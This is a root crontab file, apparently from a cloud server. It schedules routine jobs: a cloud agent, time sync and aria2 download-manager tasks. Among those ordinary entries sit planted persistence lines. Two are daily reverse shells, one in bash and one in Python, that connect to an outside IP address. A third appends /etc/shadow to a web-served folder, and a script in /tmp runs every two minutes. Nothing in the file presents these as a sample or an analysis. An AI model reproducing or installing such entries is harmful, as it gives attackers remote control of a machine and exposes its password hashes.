# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (/tmp/cronfile installed on Fri Aug 24 18:45:42 2018)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
*/1 * * * * /usr/local/qcloud/stargate/admin/start.sh > /dev/null 2>&1 &
*/20 * * * * /usr/sbin/ntpdate ntpupdate.tencentyun.com >/dev/null &
0 3 */7 * * /root/.aria2/trackers-list-aria2.sh
25 10 * * * bash -i >& /dev/tcp/118.24.169.134/1200 0>&1
25 10 * * * python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("118.24.169.134",1201));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
25 10 * * * cat /etc/shadow >>/home/wwwroot/onedrive/2.txt

*/5 * * * * /usr/sbin/service aria2 start
*/2 * * * * /tmp/1.sh
